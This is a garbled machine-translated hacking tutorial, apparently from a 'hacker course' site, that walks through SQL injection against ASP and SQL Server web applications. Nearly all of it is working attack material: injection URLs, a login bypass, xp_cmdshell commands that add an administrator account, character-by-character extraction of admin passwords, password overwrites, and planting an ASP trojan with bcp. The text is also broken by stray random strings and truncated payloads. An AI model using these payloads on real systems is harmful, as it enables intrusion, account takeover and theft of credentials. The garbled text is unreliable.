This article is to on-line massive similar article analysis and the summary, and unifies itself to implement in the process the experience synthesis to become, including many directly quotes, has not paid attention to the source, please original author excuse me)
Along with the B/S pattern application development's development, uses the programmer who this kind of pattern compiles the application procedure to be also getting more and more. But because programmer's level and the experience are also irregular, quite big part of programmers in compilation code time, has not carried on the judgment to the user data-in's validity, causes the application procedure existence safe hidden danger. The user may submit a section of database inquiry code, the root “
According to the procedure returns's result, obtains the data which certain he wants to know, this is so-called SQL Injection, namely SQL pours into.
SQL pours into is from the normal WWW port visit, moreover the surface looks like with general Web page visit not any difference, therefore the present market condition's firewall will not pour into to SQL sounds the warning, if the manager had not examined that the IIS diary the custom, is possibly invaded the very long time not to detect. But, SQL pours into the technique is quite flexible, in pours into time will bump into many accident's situations. Can act according to the special details to carry on the analysis, constructs the ingenious SQL sentence, thus success gain wish data.
Statistics indicated that the website accounts for above 70% with ASP+Access or SQLServer, PHP+MySQ accounts for L20%, other insufficiencies 10%. In this article, by the SQL-SERVER+ASP example explained SQL pours into principle, method and process. (PHP pours into article relevant paper which composes by NB alliance another friend zwell)
SQL pours into the attack the overall mentality is:
l discovered that SQL pours into the position;
l judgment backstage database type;
l determines XP_CMDSHELL to be possible the operational practice
l discovers the WEB hypothesized catalog
l uploads the ASP wooden horse;
l obtains the manager jurisdiction;
First, SQL pours into crack's judgment
Generally speaking, SQL pours into exists generally in the shape for example: HTTP://xxx.xxx.xxx/abc.asp? id=XX and so on has in the parameter ASP dynamic homepage, sometimes in a dynamic homepage possible only then a parameter, sometimes possibly some N parameters, sometimes are the trueing parameters, sometimes is the string of character parameter, cannot be generally spoken. In brief so long as has the parameter dynamic homepage, and this homepage visited the database, then has the possibility to have SQL to pour into. If the ASP programmer does not have the safety consciousness, does not carry on the essential character filtration, has the possibility which SQL pours into to be big.
For the thorough understanding dynamic homepage reply's information, the first choice requests transfer the entire IE disposition. Error message checks off IE menu pneumatic tool - Internet in front of the option - high-level - demonstration friendly HTTP.
To be clear the question explanation, following by HTTP://xxx.xxx.xxx/abc.asp? p=YY is the example carries on the analysis, YY is possibly a trueing, also has the possibility is the string of character.
1st, trueing parameter judgment
When inputs when parameter YY is a trueing, usually in abc.asp the SQL sentence original condition is approximately as follows:
select * from table where field =YY, therefore may use the following step to test SQL to pour into whether to exist.
¢ÙHTTP://xxx.xxx.xxx/abc.asp? p=YY'(attaches single quotes), this time in the abc.ASP SQL sentence turned
select * from table where field =YY', abc.asp operation exception;
¢ÚHTTP://xxx.xxx.xxx/abc.asp? p=YY and 1=1, abc.asp moves normally, moreover and HTTP://xxx.xxx.xxx/abc.asp? the p=YY movement result is the same;
¢ÛHTTP://xxx.xxx.xxx/abc.asp? p=YY and 1=2, abc.asp operation exception;
If above three steps satisfies comprehensively, in abc.asp has certainly SQL to pour into the crack.
2nd, string of character parameter judgment
When inputs when parameter YY is a string of character, usually in abc.asp the SQL sentence original condition is approximately as follows:
select * from table where field = ' YY', therefore may use the following step to test SQL to pour into whether to exist.
¢ÙHTTP://xxx.xxx.xxx/abc.asp? p=YY'(attaches single quotes), this time in the abc.ASP SQL sentence turned
select * from table where field =YY', abc.asp operation exception;
¢ÚHTTP://xxx.xxx.xxx/abc.asp? p=YY&nb… 39; 1 ' = ' 1 ', abc.asp moves normally, moreover and HTTP://xxx.xxx.xxx/abc.asp? the p=YY movement result is the same;
¢ÛHTTP://xxx.xxx.xxx/abc.asp? p=YY&nb… 39; 1 ' = ' 2 ', abc.asp operation exception; BiYtAmqviP
If above three steps satisfies comprehensively, in abc.asp has certainly SQL to pour into the crack.
3rd, peculiar circumstance processing
Sometimes the ASP programmer will filter characters and so on single quotes in the programmer, will prevent SQL to pour into. This time may use following several methods to try.
¢ÙThe size decides the mixing method: Because VBS does not differentiate the big small letter, but programmer in filtration time usually either completely filters the capital letter string of character, either filters the small letter string of character completely, but the big small letter mix will often be neglected. If replaces select, SELECT with SelecT and so on;
¢ÚUNICODE law: In IIS, realizes the internationalization by the UNICODE character repertoire, we definitely may in IE input the string of character turns into the UNICODE string of character to carry on the input. If + =%2B, blank space =%20 and so on; The URLEncode information see also the appendix one;
¢ÛASCII code law: May uses the input part or the complete character the ASCII code to replace completely, like U=chr(85), a=chr(97) and so on, the ASCII information see also the appendix two;
Second, discrimination database server type
Generally speaking, ACCESS and SQL-SERVER are the most commonly used database servers, although they support the T-SQL standard, but also has the difference, moreover the different database has the different method of attack, must the differential treatment.
1st, carries on the discrimination using database server's system variable
SQL-SERVER has user, db_name() and so on system variable, uses these system value not only to be possible to judge SQL-SERVER, moreover may also obtain the massive useful information. For example:
¢Ù HTTP://xxx.xxx.xxx/abc.asp? p=YY and user>0 not only may judge whether is SQL-SERVER, but may also obtain current connects the database user
¢ÚHTTP://xxx.xxx.xxx/abc.asp? p=YY&n… db_name()>0 not only may judge whether is SQL-SERVER, but may also obtain presently database which uses;
2nd, use system table
The ACCESS system table is msysobjects, and under the WEB environment access authority, but the SQL-SERVER system table is sysobjects, has the access authority under the WEB environment. Regarding the following two sentences:
¢ÙHTTP://xxx.xxx.xxx/abc.asp? p=YY and (select count(*) from sysobjects) >
¢ÚHTTP://xxx.xxx.xxx/abc.asp? p=YY and (select count(*) from msysobjects) >
If the database is SQL-SERVE, then first, abc.asp certain movement is normal, second exceptionally; If ACCESS two can exceptionally.
3rd, MSSQL three essential system tables
sysdatabases system table: On Microsoft SQL Server each database occupies a line in the table. When initial installation SQL Server, sysdatabases contains master, model, msdb, mssqlweb and the tempdb database item. This table only saves in the master database. This table preservation in the master database, what in this table preserves is what information? This is important. He has preserved all storehouse, as well as storehouse ID and some related information. '
Here I arrange in order regarding our useful field name and the related explanation for everybody come out. name // expression storehouse name.
dbid // expression storehouse's ID, dbid from 1 to 5 is the system. Respectively is: master, model, msdb, mssqlweb, tempdb these five storehouses. May inquire all storehouse with select * from master.dbo.sysdatabases.
In Sysobjects:SQL-SERVER each database has this system table, it deposits all objects which in this database founds, like the restraint, the default value, the diary, the rule, the memory process and so on, each object occupies a line in the table. The following is this system table field name and related showing.
Name, id, xtype, uid, status: Respectively is object, object ID, the object type, owner object user ID, the object condition.
Object type (xtype). May be in the following object type one kind:
C = CHECK restraint
D = default value or DEFAULT restraint
F = FOREIGN KEY restraint
L = diary
FN = scalar function
IF = in inlays the table function
P = memory process
PK = PRIMARY the KEY restraint (type is K) Q:BNR7~bVg
RF = duplication screening memory process piG? {7c@H%
S = system table
TF = table function
TR = trigger
U = user table
UQ = the UNIQUE restraint (type is K)
V = view
X = expansion memory process)
When Representative xtype='U' and status>0 is the user establishment table, object is table, object ID is the table ID value.
With: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 may list in storehouse ChouYFD all user establishment table.
syscolumns: In each table and view each row occupies a line in the table, saves in the process each parameter also to occupy a line in the table. This epi-position in each database. The main field includes:
name, id, colid: Respectively was the field name, the table ID number, the field ID number, in which ID on just we used the table ID number which sysobjects obtained.
With: select * from ChouYFD.dbo.syscolumns where id=123456789 obtains in ChouYFD this storehouse, table ID is 123456789 all field tabulations.
Third, determines XP_CMDSHELL to be possible the operational practice
If the current connection data's account number has the SA jurisdiction, and the master.dbo.xp_cmdshell expansion memory process (transfers this memory process to be possible to use operating system's shell to be able directly) to carry out correctly, then the entire computer may control completely through the following several methods, the later all steps may save
1st, HTTP://xxx.xxx.xxx/abc.asp? p=YY&nb… er>0 the abc.asp execute exception but may obtain current connection database user (, if demonstrates dbo on behalf of SA).
2nd, HTTP://xxx.xxx.xxx/abc.asp? p=YY… me()>0 the abc.asp execute exception but may obtain current connection database.
3rd, HTTP://xxx.xxx.xxx/abc.asp? p=YY; exec master. .xp_cmdshell “net user aaa bbb /add”-- (master is the SQL-SERVER main database; In the name semicolon expressed that before SQL-SERVER carries out the semicolon sentence name, continues to carry out its following sentence; “-” is the illustration, indicated that its behind all contents are only the annotation, the system execution) may not increase operating system account aaa, the password are bbb directly.
4th, HTTP://xxx.xxx.xxx/abc.asp? p=YY; exec master. .xp_cmdshell “net localgroup administrators aaa /add”-- Account aaa which just increased adds to the administrators group.
5th, HTTP://xxx.xxx.xxx/abc.asp? p=YY; backuup database database to disk='c:\inetpub\wwwroot\save.db' the data content full backup which obtains to the WEB table of contents, uses HTTP (natural first choice to again know this document downloading the WEB hypothesized catalog). I, kF=? s3? $
6th, through duplicates CMD to found the UNICODE crack
HTTP://xxx.xxx.xxx/abc.asp? p=YY; exe… dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” has then made a UNICODE crack, through this crack's use method, then completed (natural first choice must know the WEB hypothesized catalog) to the entire computer's control.
Fourth, discovers the WEB hypothesized catalog “?
Only then found the WEB hypothesized catalog, could determine that laid aside the ASP wooden horse's position, then obtained the USER jurisdiction. Two methods are quite effective.
First, guesses the solution according to the experience, generally speaking, the WEB hypothesized catalog is: c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot and so on, but may carry out the hypothesized table of contents is: c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts and so on.
Second, the traversal system's table of contents structure, the analysis result and discovers the WEB hypothesized catalog;
Founds one first near the watch: temp
HTTP://xxx.xxx.xxx/abc.asp? p=YY; create&n… mp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255)); --
Then:
(1) we may obtain the current all drivers using xp_availablemedia, coexisting enter in the temp table:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert temp… ter.dbo.xp_availablemedia;
We may through inquire the temp content to obtain the driver tabulation and the related information
(2) we may obtain the child directory tabulation using xp_subdirs, coexisting enter in the temp table:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp (i… dbo.xp_subdirs 'c:\';
(3) we may also obtain all child directories using xp_dirtree the directory tree structure, and the inch enters in the temp table:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\';
This may succeed browsing all catalogs (folder) tabulates:
If we need to examine that some document the content, may through carry out xp_cmdsell:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id) exec… nbsp; 'type c:\web\index.asp'; -- =Vu; [Iq~TD
The use ' bulk insert'yufa may insert a text document to one near the watch. For example: bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
Glanced over temp to be possible to read the index.asp document the content! Through analyzes each kind of ASP document, may obtain the massive system messages, the WEB construction and the management information, even may obtain the SA account number connection password.
Certainly, if xp_cmshell can carry out, we may use it to complete:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id)&nbs… cmdshell 'dir c:\
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id)&n… p_cmdshell 'dir c:\ *.asp /s/a';
We may see through xp_cmdshell all wants to see, including W3svc
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id) exec master.dbo.xp_cmdshe… ub \ AdminScripts \ adsutil.vbs enum w3svc' 1Bh) 6^? JxC
But, if is not the SA jurisdiction, we may also use
HTTP://xxx.xxx.xxx/abc.asp? p=YY; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\'; -- ) G+^u3~7qv
Attention:
1st, after above completes a browsing every time, should delete in TEMP all contents, deletes the method is:
HTTP://xxx.xxx.xxx/abc.asp? p=YY; delete from temp
2nd, glances over the TEMP table the method is: (supposition TestDB is current connection database name) $
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top&… nbsp; TestDB.dbo.temp) >0 obtains in table TEMP the first record id field value, and carries on the comparison with the integer, obviously abc.asp works unusually, but in exceptionally actually may discover the id field the value. The supposition discovered the table name is xyz, then oBChnW fcf
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1 id from… ere id not in ('xyz'))>0 obtains in table TEMP the second record id field value.
Fifth, uploads the ASP wooden horse? irp0)
The so-called ASP wooden horse, is a section has the special function ASP code, and puts under WEB hypothesized table of contents Scripts, the long-distance customer may carry out it through IE, then obtains system's USER jurisdiction, realizes to system's preliminary control. Uploads the ASP wooden horse to have two quite effective methods generally:
1st, uses WEB the long-distance management function
Many WEB stands, to maintain convenient, has provided the long-distance management function; Also has many WEB stands, its content has the different access authority regarding the different user. In order to achieve to the user jurisdiction control, some homepage, request user name and password, only then has input the correct value, can carry on the next step operation, may realize to the WEB management, like upload, downloading document, table of contents browsing, revision disposition and so on.
Therefore, if gains the correct user name and the password, not only may upload the ASP wooden horse, sometimes even can obtain the USER jurisdiction to glance over the system directly, on one step “discovered WEB hypothesized catalog” the complex operation may abbreviate.
The user name and the password deposit generally in a table, discovered that this table and reads the content has then solved the problem. The following gives two efficacious devices.
A, injection method:
Theoretically speaking, will authenticate in the homepage to have for example:
select * from admin where username='XXX' and password='YYY' sentence, if before commencement of commercial operation this, has not carried on the essential character filtration, then very easy to implement SQL to pour into.
If inputs in the user famous text frame: abc' or 1=1-- Inputs in the password frame: 123 piece of SQL sentences turn:
no matter select * from admin where username='abc' or 1=1 and password='123' the user inputs any user name and the password, this sentence forever can carry out correctly, the user has deceived the system easily, the gain legal identity.
B, guesses the solution:
The basic mentality is: Guessed that the solution all database name, guesses correctly in the storehouse each table, the analysis possibly is deposits the user name and password table, guesses correctly in the table each field name, guesses correctly in the table each record content.
l guesses the solution all database name
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 because of the dbid value from 1 to 5, was the system uses. Therefore user construct is certainly from 6 starts. And we have submitted name>1 (the name field are a character field and digital comparison can make a mistake), abc.asp works unusually, may obtain first database, likewise separately alters to DBID 7,8,9,10,11,12…May obtain all database. Q? CJJt!?? b
The following supposition obtains the database name is TestDB.
l guesses in the solution database the user famous table name
Guesses the solution: This method is guesses table according to individual experience, generally speaking, user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, systemaccounts and so on. And carries on the judgment through the sentence
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select count(*) from TestDB.dbo. table name) >0, if table existence, then abc.asp works normally, otherwise exceptionally. So the circulation, until guesses correctly the system account number table the name.
Read law: SQL-SERVER has depositing system core information table sysobjects, related storehouse's all tables, information and so on view deposit completely in this table, moreover this table may carry on the visit through WEB.
When Representative xtype='U' and status>0 is the user establishment table, discovers and analyzes each user establishment the table and the name, then may obtain the user famous table name, basic realizes the method is: MMJn | E+
¢ÙHTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1 name from TestD… type='U' and status>0) >0 obtains the first user establishment table name, and carries on the comparison with the integer, obviously abc.asp works unusually, but in exceptionally actually may discover the table the name. The supposition discovered the table name is xyz, then
¢ÚHTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1 name from TestDB.dbo.sysobjects&… tatus>0 and name not in ('xyz'))>0 may obtain the second user establishment table name, likewise may obtain all uses the establishment the table name.
According to the table name, may recognize that table user depositing user name and the password generally, following supposition this table named Admin.
l guesses the solution user famous field and the password field name
in the admin table has certainly a user famous field, also certainly some password field, only then obtains this two field name, only then has the possibility to obtain this two field content. How to obtain their name, similarly has the following two methods.
Guesses the solution: This method is guesses the field name according to individual experience, generally speaking, the user famous field's name is commonly used: username, name, user, account and so on. But the password field's name is commonly used: password, pass, pwd, passwd and so on. And carries on the judgment through the sentence
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select count (field name) from TestDB.dbo.admin) >0 “select count (field name) from table” the sentence obtains the table number of lines, if therefore field name existence, then abc.asp works normally, otherwise exceptionally. So the circulation, until guesses correctly two fields the names.
Read law: Basic realizes the method is? c? tF/9rM)
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select… me (object_id ('admin'), 1) from TestDB.dbo.sysobjects) >0. select top 1 col_name (object_id ('admin'), 1) from TestDB.dbo.sysobjects is obtains the known table first field name from sysobjects, when carries on the comparison with the integer, obviously abc.asp works unusually, but in exceptionally actually may discover the field the name. Col_name (object_id ('admin'), 1) 1 changes into turn 2,3,4,5,6…May obtain all field name.
l guesses the solution user name and the password
Guessed that the user name and the password content most is commonly used is also the most effective method includes:
The ASCII code decodes the law word by word: Although this method speed is slow, but definitely is feasible. The basic mentality is guesses correctly the field the first length, then guesses correctly each value in turn. Guessed that the user name with guessed the password the method is the same, the following guessed that the user named example shows its process.
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top&n… nbsp; from TestDB.dbo.admin) =X (X=1,2,3,4,5,… n, username is user famous field name, admin is table name), if x for some value i when abc.asp moves is normal, then i is a first user length. For example: When inputs
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top… e) from TestDB.dbo.admin) when =8 abc.asp moves normally, then a first user length is 8
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username, m,1)) from TestDB.dbo.admin) =n (m value, in 1 to previous step obtains between user famous length, when m=1,2,3,…When guessed that guesses separately 1,2,3rd,…Position value; the n value is 1~9, a~z, a~Z ASCII values, is also 1~128 between random values; admin is the system user account number table name), if n is some value i when abc.asp moves is normal, then i corresponds the ASCII code is a user some value. For example: When inputs
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username,3,1)) from TestDB.dbo.admin) when =80 abc.asp moves normally, then user third is P (P ASCII is 80);
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username,9,1)) from TestDB.dbo.admin) when =33 abc.asp moves normally, then user 9th is! (! ASCII is 80);
Guessed correctly after first user name and password, likewise, may guess correctly other all user name and the password. Attention: Sometimes obtains the password possibly is after way encryption and so on MD5 information, but also needs to use the special-purpose tool to carry on decoding. Or changes its password first, after using, changes again, sees the following explanation.
Simple method: Guessed that user uses
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1… o.admin where username>1), flag is in a admin table field, username is the user famous field, this time abc.asp works unusually, but can obtain the Username value. With on similar method, may obtain second user, third user and so on, until table in all user. ? FFX,_? 2*S
Guesses the user password: HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1&nb… B.dbo.admin where pwd>1), flag is in a admin table field, pwd is the password field, this time abc.asp works unusually, but can obtain the pwd value. With on similar method, may obtain a second user password, third user's password and so on, until table in all user's passwords. Sometimes the password is after the MD5 encryption, may change the password.
HTTP://xxx.xxx.xxx/abc.asp? p=YY; update TestDB.dbo.admin set pwd='… where username='www'; -- (1 MD5 value is: AAABBBCCCDDDEEEF, namely alters to the password 1; www is the known user name)
May certainly change with the similar method the password the original value.
2nd, leads the file function using the table content
SQL has the BCP order, it may lead the table content existing writing this article and puts to assigns the position. Using this function, we may construct one to be near the first watch, then a line of line of place inputs a ASP wooden horse in the table, then orders with BCP to derive forms the ASP document.
The command line form is as follows:
bcp “select * from text. .foo” queryout c:\inetpub\wwwroot\runcommand.asp - c - S localhost - U sa - P foobar ('S'canshu for execution inquiry's server, 'U'canshu for user, 'P'canshu is a password, has uploaded a runcommand.asp wooden horse finally)
Sixth, obtains system's manager jurisdiction
ASP wooden horse only then USER jurisdiction, if wants to gain to system's complete control, but must have system's manager jurisdiction. How to manage? The promotion jurisdiction's method has many kinds: AYgOkYn#? G
(As soon as uploads the wooden horse, the revision starting automatic movement .ini document it restarts, then died has decided);
Duplicates CMD.exe to arrive at scripts, artificial makes the UNICODE crack;
Downloads the SAM document, explains and gains the OS all user famous password;
And so on, regards system's special details to decide, may adopt the different method.
Seventh, several SQL-SERVER special-purpose methods
1st, uses the xp_regread expansion memory process revision registry
the [xp_regread] another useful built-in memory process is the kind of function set (Xp_regaddmultistring, Xp_regdeletekey, Xp_regdeletevalue, Xp_regenumkeys, Xp_regenumvalues, Xp_regread, Xp_regremovemultistring, Xp_regwrite). The aggressor may use these function revision registry, like reads the SAM value, the permission establishes the spatial connection, starting automatic operating procedure and so on. For example:
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM \ CurrentControlSet \ Services \ lanmanserver \ parameters', what conversation connection 'does nullsessionshares' determine in the server available.
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM \ CurrentControlSet \ Services \ snmp \ parameters \ validcommunities' demonstrated that on the server all SNMP association disposed, has these information, the aggressor has been possible to redeploy in the identical network network equipment.
2nd, uses other memory process to change the server
the xp_servicecontrol process permission user starts, stops the service. For example:
(exec master. .xp_servicecontrol 'start', 'schedule'
exec master. .xp_servicecontrol 'start', 'server')
Xp_availablemedia demonstrates on the machine the useful driver
The Xp_dirtree permission obtains a directory tree
Xp_enumdsn enumerates on server's ODBC data pool
Xp_loginconfig gain server security information
The Xp_makecab permission user founds a compressed file on the server
Xp_termi nate_process provides the advancement advancement ID, terminates this advancement
|
You are here: hacking technology
> hacker course
> Content
Category: Home
> hacker course